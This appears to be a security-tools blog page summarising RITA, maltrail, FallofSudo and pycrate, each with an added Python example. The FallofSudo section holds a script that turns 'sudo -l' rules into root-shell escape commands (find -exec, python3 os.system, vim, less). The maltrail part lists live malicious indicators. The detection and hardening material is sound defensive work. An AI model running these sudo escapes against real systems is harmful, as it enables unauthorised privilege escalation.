Posts

RITA v1.1.1: Real Intelligence Threat Analytics

Real Intelligence Threat Analytics (RITA) is an open source framework for network traffic analysis. The framework ingests Bro logs and currently supports the following analysis features:
- Beaconing detection: search for signs of beaconing behaviour in and out of your network
- DNS tunneling detection: search for signs of DNS-based covert channels
- Blacklist checking: query blacklists to search for suspicious domains and hosts
- URL length analysis: search for lengthy URLs indicative of malware
- Scanning detection: search for signs of port scans in your network
Changelog v1.1.1 changes:
- Make some commands periodically check for program updates (#255)
- Update Mongo version to 3.6 (#248)
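The beaconing check is the feature most people run RITA for, so here is a worked illustration of the idea on Bro (now Zeek) conn.log data. This is an added example, not RITA's code: it scores each (source, destination) pair by how regular the gaps between its connections are (coefficient of variation of the inter-connection intervals), which is the simplest form of the signal RITA builds on. The conn.log excerpt, thresholds and field names used here are constructed for the example.

```python
import statistics
from collections import defaultdict

# Constructed Bro/Zeek conn.log excerpt (tab-separated; only the "#fields"
# header line is kept). 10.0.0.5 -> 203.0.113.10 connects every ~60 s with
# slight jitter, i.e. a beacon; the other rows are irregular traffic.
SAMPLE_CONN_LOG = (
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\n"
    "1530000000.000\tCa\t10.0.0.5\t49152\t203.0.113.10\t443\ttcp\n"
    "1530000005.000\tCb\t10.0.0.7\t49200\t198.51.100.20\t80\ttcp\n"
    "1530000017.000\tCc\t10.0.0.7\t49201\t198.51.100.20\t80\ttcp\n"
    "1530000060.200\tCd\t10.0.0.5\t49153\t203.0.113.10\t443\ttcp\n"
    "1530000120.000\tCe\t10.0.0.5\t49154\t203.0.113.10\t443\ttcp\n"
    "1530000180.100\tCf\t10.0.0.5\t49155\t203.0.113.10\t443\ttcp\n"
    "1530000200.000\tCg\t10.0.0.7\t49202\t198.51.100.20\t80\ttcp\n"
    "1530000203.000\tCh\t10.0.0.7\t49203\t198.51.100.20\t80\ttcp\n"
    "1530000239.900\tCi\t10.0.0.5\t49156\t203.0.113.10\t443\ttcp\n"
    "1530000300.300\tCj\t10.0.0.5\t49157\t203.0.113.10\t443\ttcp\n"
    "1530000360.000\tCk\t10.0.0.5\t49158\t203.0.113.10\t443\ttcp\n"
    "1530000419.800\tCl\t10.0.0.5\t49159\t203.0.113.10\t443\ttcp\n"
    "1530000900.000\tCm\t10.0.0.7\t49204\t198.51.100.20\t80\ttcp\n"
    "1530000950.000\tCn\t10.0.0.9\t49300\t192.0.2.50\t443\ttcp\n"
    "1530001010.000\tCo\t10.0.0.9\t49301\t192.0.2.50\t443\ttcp\n"
)


def parse_conn_log(text):
    """Return (ts, orig_h, resp_h) tuples, locating columns via the #fields header."""
    cols = None
    records = []
    for line in text.splitlines():
        if line.startswith("#fields"):
            cols = line.split("\t")[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if cols is None:
            raise ValueError("conn.log data before #fields header")
        row = dict(zip(cols, line.split("\t")))
        records.append((float(row["ts"]), row["id.orig_h"], row["id.resp_h"]))
    return records


def beacon_candidates(records, min_connections=5, max_cv=0.2):
    """Flag (src, dst) pairs whose connection intervals are suspiciously regular.

    The score is stdev/mean of the gaps between consecutive connections; a low
    value over enough connections is the basic beacon signal. Real tools add
    skew, dispersion and data-size scoring on top of this simple check.
    """
    by_pair = defaultdict(list)
    for ts, src, dst in records:
        by_pair[(src, dst)].append(ts)
    hits = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            hits[pair] = {"connections": len(stamps), "mean_interval": mean, "cv": cv}
    return hits


if __name__ == "__main__":
    for (src, dst), info in beacon_candidates(parse_conn_log(SAMPLE_CONN_LOG)).items():
        print("%s -> %s: %d connections, mean interval %.1fs, cv %.3f"
              % (src, dst, info["connections"], info["mean_interval"], info["cv"]))
```

On the constructed log the only pair that survives the connection count and regularity thresholds is 10.0.0.5 -> 203.0.113.10; the browsing-like pair has a coefficient of variation above 1 and the two-connection pair is never scored. In practice the thresholds need tuning per network, since NTP, update checks and monitoring agents are also regular.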

maltrail v0.11.10 releases: Malicious traffic detection system

Maltrail is a malicious traffic detection system. It uses publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user-defined lists, where a trail can be anything from a domain name (e.g. zvpprsensinaix.com for Banjori malware), a URL (e.g. http://109.162.38.120/harsh02.exe for a known malicious executable), an IP address (e.g. 185.130.5.231 for a known attacker) or an HTTP User-Agent header value (e.g. sqlmap for the automatic SQL injection and database takeover tool). It also uses optional advanced heuristic mechanisms that can help in the discovery of unknown threats (e.g. new malware).
Architecture: Maltrail is based on the Traffic -> Sensor <-> Server <-> Client architecture. The sensor is a standalone component running on the monitoring node (e.g. a Linux platform connected passively to the SPAN/mirroring port or transparently inline on a Linux bridge) or at the standalone machine …
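The four trail types above (domain, URL, IP, User-Agent) match differently, and the domain case in particular has to cover subdomains. The following is an added example of that matching logic, not maltrail's own code: the trail values are the ones quoted in the description, while the "info" labels, the event record format and the sample events are constructed for the example.

```python
from urllib.parse import urlsplit

# Trail values quoted in the maltrail description; info labels are constructed.
TRAILS = {
    "domain": {"zvpprsensinaix.com": "banjori (malware)"},
    "url": {"http://109.162.38.120/harsh02.exe": "known malicious executable"},
    "ip": {"185.130.5.231": "known attacker"},
    "user_agent": {"sqlmap": "sqlmap (automatic SQL injection tool)"},
}

# Constructed traffic events, one dict per observed flow/request.
SAMPLE_EVENTS = [
    {"src_ip": "10.0.0.5", "dst_ip": "198.51.100.7",
     "host": "cdn.zvpprsensinaix.com", "user_agent": "Mozilla/5.0"},
    {"src_ip": "10.0.0.6", "dst_ip": "109.162.38.120",
     "url": "http://109.162.38.120/harsh02.exe", "user_agent": "Mozilla/5.0"},
    {"src_ip": "185.130.5.231", "dst_ip": "10.0.0.80",
     "url": "http://10.0.0.80/login.php?id=1",
     "user_agent": "sqlmap/1.2.4#stable (http://sqlmap.org)"},
    {"src_ip": "10.0.0.7", "dst_ip": "192.0.2.10",
     "host": "example.com", "user_agent": "curl/7.58.0"},
]


def _domain_matches(host, trail):
    """A domain trail covers the domain itself and every subdomain of it."""
    host = host.lower().rstrip(".")
    return host == trail or host.endswith("." + trail)


def match_event(event, trails=TRAILS):
    """Return a list of (trail_type, trail, info) hits for one traffic event."""
    hits = []
    # IP trails: either side of the flow may be the known-bad address.
    for key in ("src_ip", "dst_ip"):
        ip = event.get(key)
        if ip in trails["ip"]:
            hits.append(("ip", ip, trails["ip"][ip]))
    # Domain trails: use the Host header if present, else the URL's host part.
    url = event.get("url")
    host = event.get("host") or (urlsplit(url).hostname if url else None)
    if host:
        for trail, info in trails["domain"].items():
            if _domain_matches(host, trail):
                hits.append(("domain", trail, info))
    # URL trails are exact matches.
    if url in trails["url"]:
        hits.append(("url", url, trails["url"][url]))
    # User-Agent trails are case-insensitive substrings.
    ua = (event.get("user_agent") or "").lower()
    for trail, info in trails["user_agent"].items():
        if trail.lower() in ua:
            hits.append(("user_agent", trail, info))
    return hits


def scan(events, trails=TRAILS):
    """Return {event_index: hits} for every event that touched at least one trail."""
    result = {}
    for i, event in enumerate(events):
        hits = match_event(event, trails)
        if hits:
            result[i] = hits
    return result


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, hits)
```

Note that the suffix check in _domain_matches requires the dot, so notzvpprsensinaix.com is not reported; a naive endswith() would match it and produce false positives.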

FallofSudo: Pwning sudo rules

FallofSudo has been developed to aid in the exploitation of Linux sudo rules. It should also be used to learn how to secure your sudo rules.
Download: git clone https://github.com/Critical-Start/FallofSudo.git
Usage: the script has two functions:
- Informational: passing the -i command argument makes the program show you how to exploit the specific sudo rule you are facing. This is the safest and most preferred way to use this script.
- Autopwn: passing the -a command argument makes the program auto-exploit the specific sudo rule you are facing. Be careful using this argument and ensure you know what you are doing.
Copyright (c) 2018 Critical Start
Source: https://github.com/Critical-Start/
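The informational mode described above boils down to reading the rules in `sudo -l` output and knowing which allowed binaries can spawn a shell. As an added example (not FallofSudo's code or its rule database), the script below parses constructed `sudo -l` output and reports, per rule, whether and how it yields a shell. It distinguishes two well-known classes of escape: interactive ones (vim, vi, less), which work even when the sudoers rule pins the arguments, and command-line ones (find, python3, awk), which need the rule to leave arguments unrestricted. The sample output, user and host names are constructed.

```python
import re

# Escapes performed after the program starts, so fixed sudoers arguments do
# not block them. Constructed table of well-known escapes for this example.
INTERACTIVE_ESCAPES = {
    "vim": "type :!/bin/sh at the vim command prompt",
    "vi": "type :!/bin/sh at the vi command prompt",
    "less": "type !/bin/sh at the less prompt",
}
# Escapes that need control of the command line; they only apply when the
# rule names the binary without arguments.
ARGUMENT_ESCAPES = {
    "find": "/ -exec /bin/sh \\; -quit",
    "python3": "-c 'import os; os.system(\"/bin/sh\")'",
    "awk": "'BEGIN {system(\"/bin/sh\")}'",
}

# Constructed "sudo -l" output for a hypothetical user alice on host1.
SAMPLE_SUDO_L = """Matching Defaults entries for alice on host1:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on host1:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/find
    (www-data) /usr/bin/python3
    (root) /usr/bin/less /var/log/syslog
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
    (ALL : ALL) ALL
"""

# "(runas[:group]) [TAG: ...] command [args]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text):
    """Return (runas, tags, cmd) for each rule line of 'sudo -l' output."""
    return [(m.group("runas"), m.group("tags"), m.group("cmd"))
            for m in (RULE_RE.match(line) for line in text.splitlines()) if m]


def analyze_rule(runas, tags, cmd):
    """Classify one rule and, where a shell is obtainable, say how."""
    runas_user = runas.split(":")[0].strip() or "root"
    as_user = "" if runas_user in ("root", "ALL") else "-u %s " % runas_user
    finding = {"rule": "(%s) %s%s" % (runas, tags, cmd),
               "runas": runas_user, "nopasswd": "NOPASSWD:" in tags}
    if cmd == "ALL":
        finding.update(risk="critical", why="any command as %s" % runas_user,
                       how="sudo %s/bin/sh" % as_user)
        return finding
    prog, *args = cmd.split()
    base = prog.rsplit("/", 1)[-1]
    if base in INTERACTIVE_ESCAPES:
        finding.update(risk="high",
                       why="interactive shell escape; fixed arguments do not prevent it",
                       how="sudo %s%s, then %s" % (as_user, cmd, INTERACTIVE_ESCAPES[base]))
    elif base in ARGUMENT_ESCAPES and not args:
        finding.update(risk="high",
                       why="arguments unrestricted and the binary can spawn a shell",
                       how="sudo %s%s %s" % (as_user, prog, ARGUMENT_ESCAPES[base]))
    elif base in ARGUMENT_ESCAPES:
        finding.update(risk="medium", how=None,
                       why="shell-capable binary with fixed arguments; only a concern if the fixed file or script is writable")
    else:
        finding.update(risk="review", how=None,
                       why="not a known shell escape; inspect the command manually")
    return finding


def analyze_sudo_l(text):
    return [analyze_rule(*rule) for rule in parse_sudo_l(text)]


if __name__ == "__main__":
    for f in analyze_sudo_l(SAMPLE_SUDO_L):
        print("%-9s %s%s\n          %s" % (f["risk"], f["rule"],
              " [no password]" if f["nopasswd"] else "", f["how"] or f["why"]))
```

The less rule with a pinned file is the instructive case: pinning arguments in sudoers does nothing against an editor or pager that lets the user run commands from inside it, which is why securing such rules means removing the binary rather than restricting its arguments.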

pycrate: Python library to ease the development of encoders and decoders

Pycrate is a French word for bad wine. The present software library has nothing to do with bad wine; it is simply a Python library for manipulating various digital formats in an easy way. It is the glorious successor of libmich, which was started 8 years ago and served well.
Components: Pycrate is more a software suite than a single library. It is composed of several subdirectories, each providing specific services.
pycrate_core is the core of the library:
- utils provides basic functions to manipulate integers, bytes and bits
- charpy provides the Charpy class to handle easily the consumption of a bit-stream
- elt and base provide several classes to help when building complex data structures
- repr provides simple functions to help with the representation of instances from the elt and base modules
Some of the most useful features are provided by the pack_val() function from the utils module and the Charpy class from the charpy module. They help to deal easily with packing …
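The reason a bit-stream consumer like Charpy matters is that telecom and other binary formats routinely pack fields on non-byte boundaries. The following is an added example in plain Python of what pack_val() and Charpy provide, written for this page and not pycrate's code or API: a writer that packs unsigned integers of arbitrary bit length MSB-first, a reader that consumes them, and a constructed message layout (a 4-bit version, 1-bit flag and 11-bit length sharing 16 bits, then a 16-bit id and the payload) to exercise both, including the truncated-buffer failure a parser must handle.

```python
class BitWriter:
    """Accumulate unsigned integers of arbitrary bit length, MSB first."""

    def __init__(self):
        self._bits = []

    def write_uint(self, value, bitlen):
        if not 0 <= value < (1 << bitlen):
            raise ValueError("value %d does not fit in %d bits" % (value, bitlen))
        self._bits.extend((value >> (bitlen - 1 - i)) & 1 for i in range(bitlen))

    def write_bytes(self, data):
        for b in data:
            self.write_uint(b, 8)

    def to_bytes(self):
        """Zero-pad to a byte boundary and return the packed buffer."""
        bits = self._bits + [0] * (-len(self._bits) % 8)
        out = bytearray()
        for i in range(0, len(bits), 8):
            byte = 0
            for bit in bits[i:i + 8]:
                byte = (byte << 1) | bit
            out.append(byte)
        return bytes(out)


class BitReader:
    """Consume a byte buffer bit by bit, keeping a bit-level cursor."""

    def __init__(self, data):
        self._data = data
        self._pos = 0  # bit offset from the start of the buffer

    def remaining(self):
        return len(self._data) * 8 - self._pos

    def read_uint(self, bitlen):
        if bitlen > self.remaining():
            raise ValueError("need %d bits, only %d left" % (bitlen, self.remaining()))
        value = 0
        for _ in range(bitlen):
            byte = self._data[self._pos >> 3]
            value = (value << 1) | ((byte >> (7 - (self._pos & 7))) & 1)
            self._pos += 1
        return value

    def read_int(self, bitlen):
        """Signed two's-complement integer of bitlen bits."""
        v = self.read_uint(bitlen)
        return v - (1 << bitlen) if v & (1 << (bitlen - 1)) else v

    def read_bytes(self, n):
        return bytes(self.read_uint(8) for _ in range(n))


# Constructed layout for this example (not a real protocol):
#   version:4  urgent:1  length:11  msg_id:16  payload:length*8
def pack_message(version, urgent, msg_id, payload):
    w = BitWriter()
    w.write_uint(version, 4)
    w.write_uint(1 if urgent else 0, 1)
    w.write_uint(len(payload), 11)
    w.write_uint(msg_id, 16)
    w.write_bytes(payload)
    return w.to_bytes()


def parse_message(buf):
    r = BitReader(buf)
    msg = {
        "version": r.read_uint(4),
        "urgent": bool(r.read_uint(1)),
        "length": r.read_uint(11),
        "msg_id": r.read_uint(16),
    }
    # The declared length is attacker-controlled input; read_bytes raises
    # ValueError instead of reading past the end of the buffer.
    msg["payload"] = r.read_bytes(msg["length"])
    return msg


if __name__ == "__main__":
    buf = pack_message(2, True, 0xBEEF, b"abc")
    print(buf.hex(), parse_message(buf))
```

Packing version 2, urgent set, id 0xBEEF and payload b"abc" yields 2803beef616263: the first two bytes 0x2803 hold 0010 (version), 1 (urgent) and 00000000011 (length 3) side by side, which is exactly the kind of layout that is awkward with struct but natural with a bit cursor.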